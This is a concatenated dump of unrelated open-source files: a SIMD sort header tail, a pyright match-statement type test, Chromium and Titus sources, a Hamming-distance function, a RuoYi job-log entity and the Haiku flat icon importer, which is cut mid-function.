d13, d14); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_storeu_si512((__m512i *) ptr + 7, d08); _mm512_storeu_si512((__m512i *) ptr + 8, d09); _mm512_storeu_si512((__m512i *) ptr + 9, d10); _mm512_storeu_si512((__m512i *) ptr + 10, d11); _mm512_storeu_si512((__m512i *) ptr + 11, d12); _mm512_storeu_si512((__m512i *) ptr + 12, d13); _mm512_mask_storeu_epi32((__m512i *) ptr + 13, mask, d14); } static NOINLINE void sort_15v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_loadu_si512((__m512i const *) ptr + 7);; __m512i d09 = _mm512_loadu_si512((__m512i const *) ptr + 8);; __m512i d10 = _mm512_loadu_si512((__m512i const *) ptr + 9);; __m512i d11 = _mm512_loadu_si512((__m512i const *) ptr + 10);; __m512i d12 = _mm512_loadu_si512((__m512i const *) ptr + 11);; __m512i d13 = _mm512_loadu_si512((__m512i const *) ptr + 12);; __m512i d14 = _mm512_loadu_si512((__m512i const *) ptr + 13);; __m512i d15 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 14)); sort_15v_ascending(d01, d02, d03, d04, d05, d06, d07, d08, d09, d10, d11, d12, d13, d14, d15); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_storeu_si512((__m512i *) ptr + 7, d08); _mm512_storeu_si512((__m512i *) ptr + 8, d09); _mm512_storeu_si512((__m512i *) ptr + 9, d10); _mm512_storeu_si512((__m512i *) ptr + 10, d11); _mm512_storeu_si512((__m512i *) ptr + 11, d12); _mm512_storeu_si512((__m512i *) ptr + 12, d13); _mm512_storeu_si512((__m512i *) ptr + 13, d14); _mm512_mask_storeu_epi32((__m512i *) ptr + 14, mask, d15); } static NOINLINE void sort_16v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_loadu_si512((__m512i const *) ptr + 7);; __m512i d09 = _mm512_loadu_si512((__m512i const *) ptr + 8);; __m512i d10 = _mm512_loadu_si512((__m512i const *) ptr + 9);; __m512i d11 = _mm512_loadu_si512((__m512i const *) ptr + 10);; __m512i d12 = _mm512_loadu_si512((__m512i const *) ptr + 11);; __m512i d13 = _mm512_loadu_si512((__m512i const *) ptr + 12);; __m512i d14 = _mm512_loadu_si512((__m512i const *) ptr + 13);; __m512i d15 = _mm512_loadu_si512((__m512i const *) ptr + 14);; __m512i d16 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 15)); sort_16v_ascending(d01, d02, d03, d04, d05, d06, d07, d08, d09, d10, d11, d12, d13, d14, d15, d16); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_storeu_si512((__m512i *) ptr + 7, d08); _mm512_storeu_si512((__m512i *) ptr + 8, d09); _mm512_storeu_si512((__m512i *) ptr + 9, d10); _mm512_storeu_si512((__m512i *) ptr + 10, d11); _mm512_storeu_si512((__m512i *) ptr + 11, d12); _mm512_storeu_si512((__m512i *) ptr + 12, d13); _mm512_storeu_si512((__m512i *) ptr + 13, d14); _mm512_storeu_si512((__m512i *) ptr + 14, d15); _mm512_mask_storeu_epi32((__m512i *) ptr + 15, mask, d16); } static void sort(int32_t *ptr, size_t length); }; } } #undef i2d #undef d2i #undef i2s #undef s2i #undef s2d #undef d2s #ifdef __GNUC__ #ifdef __clang__ #pragma clang attribute pop #else #pragma GCC pop_options #endif #endif #endif
33,329
3,934
<filename>packages/pyright-internal/src/tests/samples/match2.py # This sample tests type checking for match statements (as # described in PEP 634) that contain sequence patterns. from typing import Any, Generic, List, Literal, Protocol, Tuple, TypeVar, Union def test_unknown(value_to_match): match value_to_match: case a1, a2: reveal_type(a1, expected_text="Unknown") reveal_type(a2, expected_text="Unknown") case *b1, b2: reveal_type(b1, expected_text="list[Unknown]") reveal_type(b2, expected_text="Unknown") case c1, *c2: reveal_type(c1, expected_text="Unknown") reveal_type(c2, expected_text="list[Unknown]") case d1, *d2, d3: reveal_type(d1, expected_text="Unknown") reveal_type(d2, expected_text="list[Unknown]") reveal_type(d3, expected_text="Unknown") case 3, *e1: reveal_type(e1, expected_text="list[Unknown]") case "hi", *f1: reveal_type(f1, expected_text="list[Unknown]") case *g1, "hi": reveal_type(g1, expected_text="list[Unknown]") def test_list(value_to_match: List[str]): match value_to_match: case a1, a2: reveal_type(a1, expected_text="str") reveal_type(a2, expected_text="str") reveal_type(value_to_match, expected_text="List[str]") case *b1, b2: reveal_type(b1, expected_text="list[str]") reveal_type(b2, expected_text="str") reveal_type(value_to_match, expected_text="List[str]") case c1, *c2: reveal_type(c1, expected_text="str") reveal_type(c2, expected_text="list[str]") reveal_type(value_to_match, expected_text="List[str]") case d1, *d2, d3: reveal_type(d1, expected_text="str") reveal_type(d2, expected_text="list[str]") reveal_type(d3, expected_text="str") reveal_type(value_to_match, expected_text="List[str]") case 3, *e1: reveal_type(e1, expected_text="Never") reveal_type(value_to_match, expected_text="Never") case "hi", *f1: reveal_type(f1, expected_text="list[str]") reveal_type(value_to_match, expected_text="List[str]") case *g1, "hi": reveal_type(g1, expected_text="list[str]") reveal_type(value_to_match, expected_text="List[str]") def test_open_ended_tuple(value_to_match: Tuple[str, ...]): match value_to_match: case a1, a2: reveal_type(a1, expected_text="str") reveal_type(a2, expected_text="str") reveal_type(value_to_match, expected_text="tuple[str, str]") case *b1, b2: reveal_type(b1, expected_text="list[str]") reveal_type(b2, expected_text="str") reveal_type(value_to_match, expected_text="Tuple[str, ...]") case c1, *c2: reveal_type(c1, expected_text="str") reveal_type(c2, expected_text="list[str]") reveal_type(value_to_match, expected_text="Tuple[str, ...]") case d1, *d2, d3: reveal_type(d1, expected_text="str") reveal_type(d2, expected_text="list[str]") reveal_type(d3, expected_text="str") reveal_type(value_to_match, expected_text="Tuple[str, ...]") case 3, *e1: reveal_type(e1, expected_text="Never") reveal_type(value_to_match, expected_text="Never") case "hi", *f1: reveal_type(f1, expected_text="list[str]") reveal_type(value_to_match, expected_text="Tuple[str, ...]") case *g1, "hi": reveal_type(g1, expected_text="list[str]") reveal_type(value_to_match, expected_text="Tuple[str, ...]") def test_definite_tuple(value_to_match: Tuple[int, str, float, complex]): match value_to_match: case a1, a2, a3, a4 if value_to_match[0] == 0: reveal_type(a1, expected_text="int") reveal_type(a2, expected_text="str") reveal_type(a3, expected_text="float") reveal_type(a4, expected_text="complex") reveal_type(value_to_match, expected_text="tuple[int, str, float, complex]") case *b1, b2 if value_to_match[0] == 0: reveal_type(b1, expected_text="list[int | str | float]") reveal_type(b2, expected_text="complex") reveal_type(value_to_match, expected_text="Tuple[int, str, float, complex]") case c1, *c2 if value_to_match[0] == 0: reveal_type(c1, expected_text="int") reveal_type(c2, expected_text="list[str | float | complex]") reveal_type(value_to_match, expected_text="Tuple[int, str, float, complex]") case d1, *d2, d3 if value_to_match[0] == 0: reveal_type(d1, expected_text="int") reveal_type(d2, expected_text="list[str | float]") reveal_type(d3, expected_text="complex") reveal_type(value_to_match, expected_text="Tuple[int, str, float, complex]") case 3, *e1: reveal_type(e1, expected_text="list[str | float | complex]") reveal_type(value_to_match, expected_text="Tuple[int, str, float, complex]") case "hi", *f1: reveal_type(f1, expected_text="Never") reveal_type(value_to_match, expected_text="Never") case *g1, 3j: reveal_type(g1, expected_text="list[int | str | float]") reveal_type(value_to_match, expected_text="Tuple[int, str, float, complex]") case *h1, "hi": reveal_type(h1, expected_text="Never") reveal_type(value_to_match, expected_text="Never") def test_union(value_to_match: Union[Tuple[complex, complex], Tuple[int, str, float, complex], List[str], Tuple[float, ...], Any]): match value_to_match: case a1, a2, a3, a4 if value_to_match[0] == 0: reveal_type(a1, expected_text="int | str | float | Any") reveal_type(a2, expected_text="str | float | Any") reveal_type(a3, expected_text="float | str | Any") reveal_type(a4, expected_text="complex | str | float | Any") reveal_type(value_to_match, expected_text="tuple[int, str, float, complex] | List[str] | tuple[float, float, float, float] | Any") case *b1, b2 if value_to_match[0] == 0: reveal_type(b1, expected_text="list[complex] | list[int | str | float] | list[str] | list[float] | list[Any]") reveal_type(b2, expected_text="complex | str | float | Any") reveal_type(value_to_match, expected_text="Tuple[complex, complex] | Tuple[int, str, float, complex] | List[str] | Tuple[float, ...] | Any") case c1, *c2 if value_to_match[0] == 0: reveal_type(c1, expected_text="complex | int | str | float | Any") reveal_type(c2, expected_text="list[complex] | list[str | float | complex] | list[str] | list[float] | list[Any]") reveal_type(value_to_match, expected_text="Tuple[complex, complex] | Tuple[int, str, float, complex] | List[str] | Tuple[float, ...] | Any") case d1, *d2, d3 if value_to_match[0] == 0: reveal_type(d1, expected_text="complex | int | str | float | Any") reveal_type(d2, expected_text="list[str | float] | list[str] | list[float] | list[Any]") reveal_type(d3, expected_text="complex | str | float | Any") reveal_type(value_to_match, expected_text="Tuple[complex, complex] | Tuple[int, str, float, complex] | List[str] | Tuple[float, ...] | Any") case 3, e1: reveal_type(e1, expected_text="complex | float | Any") reveal_type(value_to_match, expected_text="tuple[Literal[3], complex] | tuple[Literal[3], float] | Any") case "hi", *f1: reveal_type(f1, expected_text="list[str] | list[Any]") reveal_type(value_to_match, expected_text="List[str] | Any") case *g1, 3j: reveal_type(g1, expected_text="list[complex] | list[int | str | float] | list[Any]") reveal_type(value_to_match, expected_text="Tuple[complex, complex] | Tuple[int, str, float, complex] | Any") case *h1, "hi": reveal_type(h1, expected_text="list[str] | list[Any]") reveal_type(value_to_match, expected_text="List[str] | Any") class SupportsLessThan(Protocol): def __lt__(self, __other: Any) -> bool: ... def __le__(self, __other: Any) -> bool: ... SupportsLessThanT = TypeVar("SupportsLessThanT", bound=SupportsLessThan) def sort(seq: List[SupportsLessThanT]) -> List[SupportsLessThanT]: match seq: case [] | [_]: reveal_type(seq, expected_text="List[SupportsLessThanT@sort]") return seq case [x, y] if x <= y: reveal_type(seq, expected_text="List[SupportsLessThanT@sort]") return seq case [x, y]: reveal_type(seq, expected_text="List[SupportsLessThanT@sort]") return [y, x] case [x, y, z] if x <= y <= z: reveal_type(seq, expected_text="List[SupportsLessThanT@sort]") return seq case [x, y, z] if x > y > z: reveal_type(seq, expected_text="List[SupportsLessThanT@sort]") return [z, y, x] case [p, *rest]: a = sort([x for x in rest if x <= p]) b = sort([x for x in rest if p < x]) reveal_type(seq, expected_text="List[SupportsLessThanT@sort]") return a + [p] + b return seq def test_exceptions(seq: Union[str, bytes, bytearray]): match seq: case [x, y]: reveal_type(x, expected_text="Never") reveal_type(y, expected_text="Never") return seq def test_object(seq: object): match seq: case (a1, a2) as a3: reveal_type(a1, expected_text="object") reveal_type(a2, expected_text="object") reveal_type(a3, expected_text="Sequence[object]") reveal_type(seq, expected_text="Sequence[object]") case (*b1, b2) as b3: reveal_type(b1, expected_text="list[object]") reveal_type(b2, expected_text="object") reveal_type(b3, expected_text="Sequence[object]") reveal_type(seq, expected_text="Sequence[object]") case (c1, *c2) as c3: reveal_type(c1, expected_text="object") reveal_type(c2, expected_text="list[object]") reveal_type(c3, expected_text="Sequence[object]") reveal_type(seq, expected_text="Sequence[object]") case (d1, *d2, d3) as d4: reveal_type(d1, expected_text="object") reveal_type(d2, expected_text="list[object]") reveal_type(d3, expected_text="object") reveal_type(d4, expected_text="Sequence[object]") reveal_type(seq, expected_text="Sequence[object]") case (3, *e1) as e2: reveal_type(e1, expected_text="list[object]") reveal_type(e2, expected_text="Sequence[object | int]") reveal_type(seq, expected_text="Sequence[object | int]") case ("hi", *f1) as f2: reveal_type(f1, expected_text="list[object]") reveal_type(f2, expected_text="Sequence[object | str]") reveal_type(seq, expected_text="Sequence[object | str]") case (*g1, "hi") as g2: reveal_type(g1, expected_text="list[object]") reveal_type(g2, expected_text="Sequence[object | str]") reveal_type(seq, expected_text="Sequence[object | str]") case [1, "hi", True] as h1: reveal_type(h1, expected_text="Sequence[int | str | bool]") reveal_type(seq, expected_text="Sequence[int | str | bool]") case [1, i1] as i2: reveal_type(i1, expected_text="object") reveal_type(i2, expected_text="Sequence[object | int]") reveal_type(seq, expected_text="Sequence[object | int]") _T = TypeVar('_T') class A(Generic[_T]): a: _T class B: ... class C: ... AAlias = A AInt = A[int] BOrC = B | C def test_illegal_type_alias(m: object): match m: case AAlias(a=i): pass # This should generate an error because it raises an # exception at runtime. case AInt(a=i): pass # This should generate an error because it raises an # exception at runtime. case BOrC(a=i): pass def test_negative_narrowing1(subj: tuple[Literal[0]] | tuple[Literal[1]]): match subj: case (1,*a) | (*a): reveal_type(subj, expected_text="tuple[Literal[1]] | tuple[Literal[0]]") reveal_type(a, expected_text="list[int]") case b: reveal_type(subj, expected_text="Never") reveal_type(b, expected_text="Never") def test_negative_narrowing2(subj: tuple[int, ...]): match subj: case (1,*a): reveal_type(subj, expected_text="tuple[int, ...]") reveal_type(a, expected_text="list[int]") case (b,): reveal_type(subj, expected_text="tuple[int]") reveal_type(b, expected_text="int") case (*c,): reveal_type(subj, expected_text="tuple[int, ...]") reveal_type(c, expected_text="list[int]") case d: reveal_type(subj, expected_text="Never") reveal_type(d, expected_text="Never")
6,683
777
<gh_stars>100-1000 // Copyright 2015 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef IOS_CHROME_TODAY_EXTENSION_NOTIFICATION_CENTER_BUTTON_H_ #define IOS_CHROME_TODAY_EXTENSION_NOTIFICATION_CENTER_BUTTON_H_ #import <UIKit/UIKit.h> #import "ios/chrome/today_extension/transparent_button.h" // A button with a separated view background. This is needed as background // objects in notification center must be subviews of a UIVisualEffectView. @interface NotificationCenterButton : TransparentButton // Designated initializer. // Initializes a button with |title|, normal icon with asset named |icon|, // calling [target action] on UIControlEventTouchUpInside // event. |backgroundColor|, |inkColor|, |titleColor| are respectively the // background inactive color, the background pressed color, and the title color. - (instancetype)initWithTitle:(NSString*)title icon:(NSString*)icon target:(id)target action:(SEL)action backgroundColor:(UIColor*)backgroundColor inkColor:(UIColor*)inkColor titleColor:(UIColor*)titleColor; // Sets the different spaces of the button. // |separator| is the distance between the left of the icon and the left of the // text (in LTR), // |frontShift| shifts the center of the button to the front by |frontShift|/2, // (front is left in LTR, right in RTL). // |horizontalPadding| sets the left and right paddings, // |verticalPadding| sets the top and bottom paddings. - (void)setButtonSpacesSeparator:(const CGFloat)separator frontShift:(const CGFloat)frontShift horizontalPadding:(const CGFloat)horizontalPadding verticalPadding:(const CGFloat)verticalPadding; @end #endif // IOS_CHROME_TODAY_EXTENSION_NOTIFICATION_CENTER_BUTTON_H_
717
313
<filename>titus-server-master/src/main/java/com/netflix/titus/master/endpoint/v2/rest/LeaderResource.java /* * Copyright 2018 Netflix, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.netflix.titus.master.endpoint.v2.rest; import javax.inject.Inject; import javax.inject.Singleton; import javax.ws.rs.GET; import javax.ws.rs.Path; import javax.ws.rs.Produces; import javax.ws.rs.core.MediaType; import com.netflix.titus.api.endpoint.v2.rest.representation.LeaderRepresentation; import com.netflix.titus.api.supervisor.service.MasterDescription; import com.netflix.titus.api.supervisor.service.MasterMonitor; /** * */ @Path(LeaderEndpoint.PATH_API_V2_LEADER) @Produces(MediaType.APPLICATION_JSON) @Singleton public class LeaderResource implements LeaderEndpoint { private final MasterMonitor masterMonitor; @Inject public LeaderResource(MasterMonitor masterMonitor) { this.masterMonitor = masterMonitor; } @GET public LeaderRepresentation getLeader() { MasterDescription masterDescription = masterMonitor.getLatestLeader(); LeaderRepresentation.Builder builder = LeaderRepresentation.newBuilder() .withHostname(masterDescription.getHostname()) .withHostIP(masterDescription.getHostIP()) .withApiPort(masterDescription.getApiPort()) .withApiStatusUri(masterDescription.getApiStatusUri()) .withCreateTime(masterDescription.getCreateTime()); return builder.build(); } }
689
627
<filename>src/fuzzy/hamming.c // Copyright (c) 2014 <NAME>, MIT License // https://github.com/Rostepher/libstrcmp #include <assert.h> #include <stddef.h> #include <string.h> #include "common.h" /// Computes and returns the hamming distance between two strings. Both strings /// must have the same length and not be NULL. More information about the /// algorithm can be found here: /// http://en.wikipedia.org/wiki/Hamming_distance /// /// @param str1 first non NULL string /// @param str2 second non NULL string /// /// @returns hamming distance or -1 if str1 and st2 did not have the same /// length or if one or both str1 and str2 were NULL int hamming(const char* str1, const char* str2) { // strings cannot be NULL assert(str1 != NULL); assert(str2 != NULL); size_t str1_len = strlen(str1); size_t str2_len = strlen(str2); // handle cases where strings have different lengths if (str1_len != str2_len) { return -1; } // return 0 if strings are both empty, but not NULL if (str1_len == 0 && str2_len == 0) { return 0; } int dist = 0; while (str1_len > 0 && str2_len > 0) { dist += (NOT_EQ(*str1, *str2)); str1++, str2++; str1_len--, str2_len--; } return dist; }
489
1,909
<filename>xchange-bitfinex/src/main/java/org/knowm/xchange/bitfinex/BitfinexResilience.java package org.knowm.xchange.bitfinex; import io.github.resilience4j.ratelimiter.RateLimiterConfig; import java.time.Duration; import org.knowm.xchange.client.ResilienceRegistries; public final class BitfinexResilience { public static final String BITFINEX_RATE_LIMITER = "bitfinexRateLimiter"; private BitfinexResilience() {} public static ResilienceRegistries createRegistries() { ResilienceRegistries registries = new ResilienceRegistries(); registries .rateLimiters() .rateLimiter( BITFINEX_RATE_LIMITER, RateLimiterConfig.from(registries.rateLimiters().getDefaultConfig()) .limitRefreshPeriod(Duration.ofMinutes(1)) .limitForPeriod(90) .build()); return registries; } }
354
2,151
// Copyright 2016 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef REMOTING_PROTOCOL_SESSION_PLUGIN_H_ #define REMOTING_PROTOCOL_SESSION_PLUGIN_H_ #include <memory> #include "third_party/libjingle_xmpp/xmllite/xmlelement.h" namespace remoting { namespace protocol { // Interface for Session plugins. Plugins allow to send and receive optional // information that is not essential for session handshake. Messages generated // by the plugins on one end of a connection are attached to the session // handshake messages and passed to the plugins on the other end. Plugins are // optional, i.e. Session doesn't need any plugins to connect successfully. class SessionPlugin { public: SessionPlugin() = default; virtual ~SessionPlugin() = default; // Returns an XmlElement if the SessionPlugin requires to attach some data // into the outgoing message. virtual std::unique_ptr<buzz::XmlElement> GetNextMessage() = 0; // Handles messages in |attachments|. virtual void OnIncomingMessage(const buzz::XmlElement& attachments) = 0; }; } // namespace protocol } // namespace remoting #endif // REMOTING_PROTOCOL_SESSION_PLUGIN_H_
361
1,532
#ifndef MAGNET_RENDER_BACKEND_SOCKET_H_ #define MAGNET_RENDER_BACKEND_SOCKET_H_ #include <string> #include <websocketpp/common/connection_hdl.hpp> #include "utility/utility.h" namespace magent { namespace render { template <class T> class ISocket : public render::Unique { protected: const T args; public: explicit ISocket(const T &args) : args(args) { } virtual void reply(const std::string &) = 0; virtual void receive(const std::string &) = 0; virtual void open() = 0; virtual void close() = 0; virtual void error() = 0; virtual void run() = 0; }; } // namespace render } // namespace magent #endif //MAGNET_RENDER_BACKEND_SOCKET_H_
260
441
/** * XQuery expressions. */ package org.basex.query.expr;
20
1,352
<reponame>gitofzhu/RuoYi package com.ruoyi.quartz.domain; import com.fasterxml.jackson.annotation.JsonFormat; import com.ruoyi.common.annotation.Excel; import com.ruoyi.common.base.BaseEntity; import io.swagger.annotations.ApiModel; import io.swagger.annotations.ApiModelProperty; import lombok.Data; import lombok.EqualsAndHashCode; import java.util.Date; /** * 定时任务调度日志表 sys_job_log * * @author ruoyi */ @EqualsAndHashCode(callSuper = true) @Data @ApiModel(description="定时任务调度日志",parent=BaseEntity.class) public class SysJobLog extends BaseEntity { private static final long serialVersionUID = 1L; @Excel(name = "日志序号") @ApiModelProperty(value="日志序号",name="jobLogId",example="1") private Long jobLogId; @Excel(name = "任务名称") @ApiModelProperty(value="任务名称",name="jobName",example="ryTask") private String jobName; @Excel(name = "任务组名") @ApiModelProperty(value="任务组名",name="jobGroup",example="系统默认(无参)") private String jobGroup; @Excel(name = "任务方法") @ApiModelProperty(value="任务方法",name="methodName",example="ryNoParams") private String methodName; @Excel(name = "方法参数") @ApiModelProperty(value="方法参数",name="methodParams") private String methodParams; @Excel(name = "日志信息") @ApiModelProperty(value="日志信息",name="jobMessage",example="ryTask 总共耗时:2毫秒") private String jobMessage; @Excel(name = "执行状态" , readConverterExp = "0=正常,1=失败") @ApiModelProperty(value="执行状态",name="status",example="0",allowableValues = "0,1",reference="0=正常,1=失败") private String status; @Excel(name = "异常信息") @ApiModelProperty(value="异常信息",name="exceptionInfo") private String exceptionInfo; @JsonFormat(pattern = "yyyy-MM-dd HH:mm:ss") @ApiModelProperty(value="开始时间",name="startTime",example="2018-12-15 18:03:58",dataType="java.util.Date") private Date startTime; @JsonFormat(pattern = "yyyy-MM-dd HH:mm:ss") @ApiModelProperty(value="结束时间",name="endTime",example="2018-12-15 18:03:58",dataType="java.util.Date") private Date endTime; }
984
1,338
<reponame>Kirishikesan/haiku /* * Copyright 2006, Haiku. All rights reserved. * Distributed under the terms of the MIT License. * * Authors: * <NAME> <<EMAIL>> */ #include "FlatIconImporter.h" #include <new> #include <stdio.h> #include <Archivable.h> #include <DataIO.h> #include <Message.h> #include "AffineTransformer.h" #include "AutoDeleter.h" #include "ContourTransformer.h" #include "FlatIconFormat.h" #include "GradientTransformable.h" #include "Icon.h" #include "LittleEndianBuffer.h" #include "PathCommandQueue.h" #include "PathContainer.h" #include "PerspectiveTransformer.h" #include "Shape.h" #include "StrokeTransformer.h" #include "Style.h" #include "StyleContainer.h" #include "VectorPath.h" using std::nothrow; // constructor FlatIconImporter::FlatIconImporter() #ifdef ICON_O_MATIC : Importer() #endif { } // destructor FlatIconImporter::~FlatIconImporter() { } // Import status_t FlatIconImporter::Import(Icon* icon, BPositionIO* stream) { #ifdef ICON_O_MATIC status_t ret = Init(icon); if (ret < B_OK) return ret; #else status_t ret; #endif // seek around in the stream to figure out the size off_t size = stream->Seek(0, SEEK_END); if (stream->Seek(0, SEEK_SET) != 0) return B_ERROR; // we chicken out on anything larger than 256k if (size <= 0 || size > 256 * 1024) return B_BAD_VALUE; // read the entire stream into a buffer LittleEndianBuffer buffer(size); if (!buffer.Buffer()) return B_NO_MEMORY; if (stream->Read(buffer.Buffer(), size) != size) return B_ERROR; ret = _ParseSections(buffer, icon); return ret; } // Import status_t FlatIconImporter::Import(Icon* icon, uint8* _buffer, size_t size) { #ifdef ICON_O_MATIC status_t ret = Init(icon); if (ret < B_OK) return ret; #endif if (!_buffer) return B_BAD_VALUE; // attach LittleEndianBuffer to buffer LittleEndianBuffer buffer(_buffer, size); return _ParseSections(buffer, icon); } // #pragma mark - // _ParseSections status_t FlatIconImporter::_ParseSections(LittleEndianBuffer& buffer, Icon* icon) { // test if this is an icon at all uint32 magic; if (!buffer.Read(magic) || magic != FLAT_ICON_MAGIC) return B_BAD_TYPE; // styles StyleContainer* styles = icon->Styles(); status_t ret = _ParseStyles(buffer, styles); if (ret < B_OK) { printf("FlatIconImporter::_ParseSections() - " "error parsing styles: %s\n", strerror(ret)); return ret; } // paths PathContainer* paths = icon->Paths(); ret = _ParsePaths(buffer, paths); if (ret < B_OK) { printf("FlatIconImporter::_ParseSections() - " "error parsing paths: %s\n", strerror(ret)); return ret; } // shapes ret = _ParseShapes(buffer, styles, paths, icon->Shapes()); if (ret < B_OK) { printf("FlatIconImporter::_ParseSections() - " "error parsing shapes: %s\n", strerror(ret)); return ret; } return B_OK; } // _ReadTransformable static bool _ReadTransformable(LittleEndianBuffer& buffer, Transformable* transformable) { int32 matrixSize = Transformable::matrix_size; double matrix[matrixSize]; for (int32 i = 0; i < matrixSize; i++) { float value; if (!read_float_24(buffer, value)) return false; matrix[i] = value; } transformable->LoadFrom(matrix); return true; } // _ReadTranslation static bool _ReadTranslation(LittleEndianBuffer& buffer, Transformable* transformable) { BPoint t; if (read_coord(buffer, t.x) && read_coord(buffer, t.y)) { transformable->TranslateBy(t); return true; } return false; } // _ReadColorStyle static Style* _ReadColorStyle(LittleEndianBuffer& buffer, bool alpha, bool gray) { rgb_color color; if (alpha) { if (gray) { if (!buffer.Read(color.red) || !buffer.Read(color.alpha)) return NULL; color.green = color.blue = color.red; } else { if (!buffer.Read((uint32&)color)) return NULL; } } else { color.alpha = 255; if (gray) { if (!buffer.Read(color.red)) return NULL; color.green = color.blue = color.red; } else { if (!buffer.Read(color.red) || !buffer.Read(color.green) || !buffer.Read(color.blue)) return NULL; } } return new (nothrow) Style(color); } // _ReadGradientStyle static Style* _ReadGradientStyle(LittleEndianBuffer& buffer) { Style* style = new (nothrow) Style(); if (!style) return NULL; ObjectDeleter<Style> styleDeleter(style); uint8 gradientType; uint8 gradientFlags; uint8 gradientStopCount; if (!buffer.Read(gradientType) || !buffer.Read(gradientFlags) || !buffer.Read(gradientStopCount)) { return NULL; } Gradient gradient(true); // empty gradient gradient.SetType((gradients_type)gradientType); // TODO: support more stuff with flags // ("inherits transformation" and so on) if (gradientFlags & GRADIENT_FLAG_TRANSFORM) { if (!_ReadTransformable(buffer, &gradient)) return NULL; } bool alpha = !(gradientFlags & GRADIENT_FLAG_NO_ALPHA); bool gray = gradientFlags & GRADIENT_FLAG_GRAYS; for (int32 i = 0; i < gradientStopCount; i++) { uint8 stopOffset; rgb_color color; if (!buffer.Read(stopOffset)) return NULL; if (alpha) { if (gray) { if (!buffer.Read(color.red) || !buffer.Read(color.alpha)) return NULL; color.green = color.blue = color.red; } else { if (!buffer.Read((uint32&)color)) return NULL; } } else { color.alpha = 255; if (gray) { if (!buffer.Read(color.red)) return NULL; color.green = color.blue = color.red; } else { if (!buffer.Read(color.red) || !buffer.Read(color.green) || !buffer.Read(color.blue)) { return NULL; } } } gradient.AddColor(color, stopOffset / 255.0); } style->SetGradient(&gradient); styleDeleter.Detach(); return style; } // _ParseStyles status_t FlatIconImporter::_ParseStyles(LittleEndianBuffer& buffer, StyleContainer* styles) { uint8 styleCount; if (!buffer.Read(styleCount)) return B_ERROR; for (int32 i = 0; i < styleCount; i++) { uint8 styleType; if (!buffer.Read(styleType)) return B_ERROR; Style* style = NULL; if (styleType == STYLE_TYPE_SOLID_COLOR) { // solid color style = _ReadColorStyle(buffer, true, false); if (!style) return B_NO_MEMORY; } else if (styleType == STYLE_TYPE_SOLID_COLOR_NO_ALPHA) { // solid color without alpha style = _ReadColorStyle(buffer, false, false); if (!style) return B_NO_MEMORY; } else if (styleType == STYLE_TYPE_SOLID_GRAY) { // solid gray plus alpha style = _ReadColorStyle(buffer, true, true); if (!style) return B_NO_MEMORY; } else if (styleType == STYLE_TYPE_SOLID_GRAY_NO_ALPHA) { // solid gray without alpha style = _ReadColorStyle(buffer, false, true); if (!style) return B_NO_MEMORY; } else if (styleType == STYLE_TYPE_GRADIENT) { // gradient style = _ReadGradientStyle(buffer); if (!style) return B_NO_MEMORY; } else { // unkown style type, skip tag uint16 tagLength; if (!buffer.Read(tagLength)) return B_ERROR; buffer.Skip(tagLength); continue; } // add style if we were able to read one if (style && !styles->AddStyle(style)) { delete style; return B_NO_MEMORY; } } return B_OK; } // read_path_no_curves static bool read_path_no_curves(LittleEndianBuffer& buffer, VectorPath* path, uint8 pointCount) { for (uint32 p = 0; p < pointCount; p++) { BPoint point; if (!read_coord(buffer, point.x) || !read_coord(buffer, point.y)) return false; if (!path->AddPoint(point)) return false; } return true; } // read_path_curves static bool read_path_curves(LittleEndianBuffer& buffer, VectorPath* path, uint8 pointCount) { for 